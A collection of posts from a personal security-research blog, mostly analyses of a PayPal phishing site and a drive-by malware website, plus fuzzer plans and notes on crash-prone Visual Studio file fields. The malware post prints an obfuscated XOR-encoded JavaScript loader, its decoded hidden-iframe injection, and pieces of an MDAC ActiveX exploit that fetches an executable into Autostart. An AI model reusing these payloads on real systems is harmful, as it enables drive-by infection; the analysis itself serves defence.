Smeels like the Past

Hi,

It’s Sunday Morning, today allow me to write some non technical stuff, this blog is a container of all my life, 98% tech 2% human.. so I want to flush my empty head this morning, just because flushing in a file taste as more ordered, and order implies clearty..

There are periods in the life that have a well defined smeel, something that is mixed up with many situations, external and internal factors..

Certain months with a precise weather, temperature, wind, sun or rain..but also time situations, works/study that begins or ends, certain people around you..nice or bad mental predispositions and happenings..

All these factors, prints in you a precise life during Smell..

There are in the life, nice parfumes and bad ones..

Today all around me smeels like a black period of my life, full of orrible torturing uncertainty, all smeels like the past sorrow and doom, but it’s only the mind torturing smeel..

Smeel of the past?

Fear that the past could became present, and the future does not exists?

Fear, fear fear, but also hope, a big full of light hope that as an unpleasant partume it will vanish…

or the one that wil vanish will be again my self?

I Hope that this suffucating parfume will be only the Smeel of the Past, and not the crude Reality of the Present..

Lost lost lost.. Burzum’s Draungen picture represents perfectly this parfume..and this uncertain Sunday of another Spring..

See you to the next post.. I promise..a tech one 🙂

PayPal Fraud

Hi,

Today my girl reported me an evident attempt of Fraud linked to PayPal Account. Let’s analyse it!

——————————–

—– Original Message —–

From: PayPaI Notice!

Sent: Thursday, April 17, 2008 2:21 PM

Subject: THE PAYMENT IS PENDING FOR THE MOMENT

We recorded a payment request from “Live Strip Chat Camera Sexy Girls -www.video-chat.co.uk – Girls Show”
to enable the charge of $127.34 on your PayPal account. Because the order was made from an european internet address,
we put an Exception Payment on transaction id #POS 03 4573 motivated by our Geographical Tracking System.

THE PAYMENT IS PENDING FOR THE MOMENT .

If you made this transaction or if you just authorize this payment, please ignore or remove this email message.
The transaction will be shown on your monthly statement as “Live Strip Chat Camera Sexy Girls“.
If you didn’t make this payment and would like to decline the $127.34 billing to your card,
please follow the link below to cancel the payment : Cancel this payment ( transaction id #POS 03 4573)

Thank you for using PayPal!
The PayPal Team

Please do not reply to this email. This mailbox is not monitored and you will not receive a response.
For assistance, log in to your PayPal account and click the Help link located in the top right corner
of any PayPal page.

————————————-

The Fraud WebSite is http://217-33-56-79.capitalchelmsford.mezzonet.net/webscr/

The home page looks truly similar to the true PayPal one, but it hasn’t an SSL connection (one of the classical signs of Fraud) and ask you Email Address and PayPal Password, if mail and password have a correct format (presence of @ and Dots) we are suddenly prompted here:

http://217-33-56-79.capitalchelmsford.mezzonet.net/webscr/revalidate.htm?cmd_submitaccess0023044-submit=data_refund

where we’re asked for:

• Card number
• Expiration date
• CVV Code
• Electronic Signature

Card Number, as we can see by the source code:

if((signupFORM.car.value == “”)){
alert(“Please fill in your Card number”);
signupFORM.car.focus();
return false;
}
if(!isNumeric(signupFORM.car.value)){
alert(“Please fill a numeric card number”);
signupFORM.car.focus();r
return false;
}

if(signupFORM.car.value.length <= 15){
alert(“This is not a valid card number.”);
signupFORM.car.focus();
return false;
}
if((signupFORM.car.value == “0000000000000000”)){
alert(“Sorry! This is not a valid credit card number.”);
signupFORM.car.focus();
return false;
}
if((signupFORM.car.value == “8888888888888888”)){
alert(“Sorry! This is not a valid credit card number.”);
signupFORM.car.focus();
return false;
}
if((signupFORM.car.value == “4111111111111111”)){
alert(“Sorry! This is not a valid credit card number.”);
signupFORM.car.focus();
return false;
}

So our Card need to be Not Empty at least 15 digits long and different from 0000000000000000, 8888888888888888,

4111111111111111

CVV Code:

if(!isNumeric(signupFORM.cl.value)){
alert(“Please fill a numeric CVV2”);
signupFORM.cl.focus();
return false;
}
if((signupFORM.cl.value == “”)){
alert(“Please fill in your CVV2 number”);
signupFORM.cl.focus();
return false;
}
if(signupFORM.cl.value.length < 3){
alert(“This is not a valid CVV2.”);
signupFORM.cl.focus();
return false;

Electronic Signature (PIN):

if(signupFORM.ins.value.length < 4){
alert(“This is not a valid PIN.”);
signupFORM.ins.focus();
return false;
}
if((signupFORM.ins.value == “”)){
alert(“Please fill in your PIN”);
signupFORM.ins.focus();
return false;

If all these field are compiled correctly, we land to the final page where we’re asked for our Bank Name, and finally the congrats page 🙂

From DomainTools we obtain this:

IP Location:	United Kingdom Ftip002881171 Capital Enterprise Centres Chelmsford
Resolve Host:	217-33-56-79.capitalchelmsford.mezzonet.net
IP Address:	217.33.56.79
Blacklist Status:	Clear

Whois Record

inetnum:        217.33.56.64 – 217.33.56.127
netname:        CEC-CHELMSFORD
descr:          FTIP002881171 Capital Enterprise Centres Chelmsford
country:        GB
admin-c:        PC6279-RIPE
tech-c:         PC6279-RIPE
status:         ASSIGNED PA
mnt-by:         BTNET-MNT
mnt-lower:        BTNET-MNT
mnt-routes:        BTNET-MNT
remarks:        Please send abuse notification to 

See you to the next post.. 🙂

PS: Thanks Pì 😉

TheGreenBow VPN Client Patch Released

Hi,

TheGreenBowVPN Client Development Team, kindly asked me to publish the link to the Security Patch about my Login Credential Information Disclosure Advisory.

Here the link.

See you to the next post.. 🙂

SPAM Analysis Tools

Hi,

Here a quick list of the most used Tools for Spam Analysis:

• http://www.trimmail.com/news/tools/ – Online Tracing ( Mail Server Profiler, Open Relay Test, DNS Blacklist Check, SMTP Profiler, Traceroute Off-Site, R.E.  Test
• DNSstuff
• Reverse-Whois
• Linkspammers
• Spamlinks

Other tools will be added in the future.

See you to the next post.. 🙂

Best_Pool Exploit and Malware WebSite

Hi,

Yesterday by searching between the most strange WebSites, signaled in a forum, I’ve discovered that one of them contains an Exploit + Malware..

The Website is Best_Pool.

Suddenly I’ve inspected it with Malzilla, and an eloquent JS was loaded:

<script>
var data=unescape(“%7B%14%04%15%0E%17%13g%2B%26%29%202%26%20%22ze%0D%261%26%14%245.73eyg%23
%28%242%2A%22%293i05.3%22o%60%7B.%215%26%2A%22g45%24ze%2F337%7Dhh1.7%264%283%2C%26i%24%28%2
Ah.%29i7%2F7x%26%231zrwsva1%26%2Bzspq%25s%24%7F%26eg43%3E%2B%22ze%23.47%2B%26%3E%7D%29%28%2
9%22ey%7Bh.%215%26%2A%22y%60n%7Cg%7Bh%14%04%15%0E%17%13y”);var dec=””;
for(idx=0;idx<data.length;idx++){dec+=String.fromCharCode(data.charCodeAt(idx)^71);
}document.write(unescape(dec));
</script>

Clearly obfuscated, but in two easy steps I decoded it:

<SCRIPT language=”JavaScript”>
document.write(‘<iframe src=”http://{CENSORED}c8a”
style=”display:none”></iframe>’);
</SCRIPT>

A classical Iframe infection, so let’s check what happens into http://{CENSORED}c8a..
Malzilla detects a redirection to: http://{CENSORED}/in.php?adv=5041&val=476b4c8a a page
that contains a big Javascript obfuscated.

This JS contains three functions:

zhhrgjuf(n)
oafvme(a)
rkgganati(str)

and a big piece of encoded stuff, also this can be decoded easly, and what appears is an
HTML page that contains another JS.

Let’s analyse that JS:

It implements a function lsrn(lev3par1), inside this we notice suddenly a link to an
executable: http://{CENSORED{/adw_files/5041/175c7663/install.exe?id=1
another Variable contains:

var obj_WScript=objmker(lev3par1,”WScript.Shell”)
var obj_WScript=objmker(lev3par1,”WScript.Shell”)

hdrive+”\\Documents and Settings\\All Users\\Menu Inicio\\Programas\\Inicio”+exes
hdrive+”\\Documents and Settings\\All Users\\Menuen Start\\Programmer\\Start”+exes
hdrive+”\\Documents and Settings\\All Users\\Menu Start\\Programma\\’s\\Opstarten+exes
hdrive+”\\Documents and Settings\\All Users\\Menu Start\\Programy\\Autostart”+exes
hdrive+”\\Documents and Settings\\All Users\\Menu Start\\Programy\\Autostart”+exes
hdrive+”\\Documents and Settings\\All Users\\Menu Avvio\\Programmi\\Esecuzione automatica”+exes
hdrive+”\\Documents and Settings\\All Users\\Kaynnista-valikko\\Ohjelmat\\Kaynnistys”+exes
hdrive+”\\Documents and Settings\\All Users\\Start Menu\\Programlar\\BASLANGIC”
hdrive+”\\Documents and Settings\\All Users\\Start-meny\\Programmer\\Oppstart”+exes
hdrive+”\\Documents and Settings\\All Users\\Start-menyn\\Program\\Autostart”+exes
hdrive+”\\Documents and Settings\\All Users\\Menu Iniciar\\Programas\\Iniciar”+exes
hdrive+”\\Dokumente und Einstellungen\\All Users\\Startmenu\\Programme\\Autostart”+exes
hdrive+”\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup”+exes

To cover the major part of users, JS builds these paths relative to various languages.
Now we can see an intersing piece of code, with a CLSID:

var obj2mk=”testobj”+”.innerHTML”+”=testobj”+
“.innerHTML”+”+\”<object”+” classid”+”=’clsid:”
+”527196a4-b1a3-4647-931d-37ba5af23037″+”‘ codebase=”+”‘\”+fnex+\”‘></”+”object>\”;”;

first of all let’s search this CLSID, we discover that is referred to MDAC ActiveX
code execution (CVE-2006-0003)

An attacker who successfully exploited this vulnerability could gain the same user rights
as the local user. Users whose accounts are configured to have fewer user rights on the
system could be less impacted than users who operate with administrative user rights.

It’s clear now!
the malicious executable install.exe is downloaded, and inserted into Autostart.

Next step is to download and study this exexutable, here some characteristics of this malware:

——–
File size: 67584 bytes
MD5: 1a7baafd0d2c53c1e711a940fe6fdbeb
SHA1: a3426c0322ca1de1b83d0f5d6d1ce7366ce30f39
SHA256: e44f9e28c6810a48ca5e3b13f1585e82d37f21eed5fe88ac688f915a863d82f1
SHA512: 36f48a1a71e624dc4219a857df7ea41c7b9dd4180a78870ff6f7a78c9d2c8231
5f25cbd34db102c630b973363e211a6c0b5ac223baa2fb0fe36c3060fddd7416
——–

AntiVir                 2008.04.11     HEUR/Crypted
CAT-QuickHeal   2008.04.10     (Suspicious) – DNAScan
F-Secure              2008.04.11     Suspicious:W32/Malware!Gemini
eSafe                    2008.04.09     Suspicious File
Microsoft             2008.04.11     Trojan:Win32/Tibs.gen!H
Sophos                2008.04.11     Troj/Dorf-BB

Other Antivirus does not detect it!

See you to the next post.. 🙂

Directions

Hi,

In this little post I want to expose, what should be my future works and topics in which I’ll invest my efforst.

Actually I’m developing a Device Driver Fuzzer for Windows 2k, XP, 2k3.

This DeviceDriver Fuzzer that I’ll call Klystron, is similar to Kartoffel Driver Fuzzer, but it has a GUI based on MFC with the possibility to Mantain Trace of the used IOCTLs by hooking DeviceIoControl().

Particular attention will be revolved to IOCTLs with METHOD_NEITHER, this because the major part of device drivers Bugs come from this kind of ControlCodes that does not performs any check on the received buffer. It’s easy to decode what IOCTL use this method, due to the base encoding algorithm we can see that

0x00000003

0x00000007

0x0000000B

0x0000000F

All catched IOCTLs will be saved and next, parsed and loaded into a ListBox that will be the launcher for the Fuzz part.

The fuzz engine will be essentially based over Kartoffel, but I did not exclude that I’ll insert other fuzz options.

With Klystron its all..

In the next month I’ll be also studing, How the Presence of a Rootkits Could Affect Performance Graphics and if good results come out I’ll publish a little paper about that.

Another target will be a study paper + src code of NtSectionDebug() undocumented function

Surely I’ll also write some new Malware Reversing story, actually I’m working on Silent Banker Trojan which is a really intersting subject for a Rce Paper 😉

Frozen (not Dead) projects are:

MultiCryptoProtector

MultiStegoProtector

StegoDetector

I’ve also in plain to Translate my Elgamal Paper, and in the end of year to write A Reverse Engineering Approach to AES.

In this period I’m also a bit bored of people (cause a ligth touch of Socio-Delusion-Depression) and pointless discussions all over the so called New Internet, or better known Web 2.0, so I’ll limit at the maximum my presence on IRC/MSN and Skype.

My sopportation level is over also about Vulgarity and Obscenity that every day I’ve to hear, one of the great things of internet is the Liberty Real, or for less experienced persons, Apparent..

And for liberty I talk about the possibility to choise, the ambient that make you feel more Relaxed and Serene..and the massive vulgarity, arrogance and egoism with heavy touches of egocentrism, make me feel not so Clear not so Serene.

Surely I’m sociopatic, but now STOP, I want to exist on internet but without hearing 24/24 people that thinks to be God and talks as a porky-pig.

Some channels seems to know who you are, only when you have something to give to the others, but in other hands people is truly attentive to disclose you Resources, Sources or Links (links in all acceptions of the term).

Its really frustrating to see that, and to se how people what (implicitly) you to know that you’re not a part of a Group..

So I think the best cure for my 0Tollerance of people is to disappear a bit from all “Chat” Scenes..

See you to the next post..

Evilcry

Software Design Errors at the Borderline with Bugs

Hi there,

Today I’m going to write some my personal opinion about common Software Design Errors, that does not imply necessarly a Security Bug, but cause their Hybrid Nature could be placed at the borderline between a common Code Design Error.

The first basical and common error at the roots of a Design Error, or in the worst case of a Bug is the Input Validation, that became also the first Target to Attack, by generating in a first attempt Large Volume of Data to be received by the Software.

As you can imagine, the first Design Error is to Allow arbitrary lengths into File Formats or in every kind of interface disposed to received Data.

During time I’ve discovered some basical incongruences of well known applications, such ad in Visual Studio..

Visual Studio project file have a proprietary format, and are divided into various files: .sln, .user, .vcproj, .manifest

Each of this files has a particular structure, let’s see sln file format:

#Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project(“{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}”) = “NAME”, “PATH\PATH.vcproj”, “{17F30F81-3A72-40F0-85D5-9871C740B026}”
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{17F30F81-3A72-40F0-85D5-9871C740B026}.Debug|Win32.ActiveCfg = Debug|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

The directive Project(“{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}”) = “NAME”, “PATH\PATH.vcproj” and the fields Name and Path are totally unchecked, so an “attacker” can build evil versions of sln files by filling the Name field with large amounts of Data.

The result is a Memory Corruption Exploit, so as we have seen this Design Error became an effective bug..

Let’s see now .vcproj, that is an XML file which contains informations about compiling and linking options..

<VisualStudioProject
ProjectType=”Visual C++”
Version=”8,00″
Name=”NAME”
ProjectGUID=”{17F30F81-3A72-40F0-85D5-9871C740B026}”
RootNamespace=”MyNameSpace”
Keyword=”Win32Proj”

Also in this case Fields: Name, ProjectType, RootNamespace and Keyword are unchecked about the length aspect and checked about the Alowed Chars..

So an “attacker” can generate large ammounts of data which lead to Memory Consumpion, this is also valid for other fields of vcproj, such as

<Tool>
Name=”VCPreBuildEventTool”

Optimization=”0″
PreprocessorDefinitions=”WIN32;_DEBUG;_WINDOWS”
MinimalRebuild=”true”
BasicRuntimeChecks=”3″
RuntimeLibrary=”3″
UsePrecompiledHeader=”0″
WarningLevel=”3″
Detect64BitPortabilityProblems=”true”
DebugInformationFormat=”4″

<Tool/>

Same problem for .user files

<DebugSettings
Command=”$(TargetPath)”
WorkingDirectory=””
CommandArguments=””
Attach=”false”
DebuggerType=”3″
Remote=”1″
RemoteMachine=”ITX-C7″

RemoteMachine Field has unchecked length so big amounts of data, could block VisualStudio.

In the same way, an famous HTML Editor, 1stPage2000 could be easly crashed (due to an Heap Overflow) by producing large tags or large amounts of nidifications..

Is not necessary for an application like VS or 1stPage to allow so large names, should be better to avoid risks by ceching every length that should be manipulated..

See you to the next post.. 🙂

Hooking the Hook

Hi there,

Actually I’m working on a particular application that as first instance needs to monitor the
activity of certain functions, such as CreateFile(), ReadFile(), WriteFile
and DeviceIoControl().

Especially this last API, cause all communications between a Device Driver and the UserMode application, are accomplished by IOTCLs that are sent with DeviceIoControl().

So essentially we need to implement an API Monitoring application, and this can be done by hooking the wanted API and using next an empty Trampoline function, just to grab the used parameters.

The most intersting hooking are:
Microsoft’s Detour -> http://research.microsoft.com/sn/detours/
Deviare -> http://www.nektra.com/products/deviare/index.php
Mini-HookEngine ->http://www.codeproject.com/KB/system/mini_hook_engine.aspx

My suggestion is to use Deviare or Mini-HookEngine are really easy and powerful! 😉

Regards,
Evilcry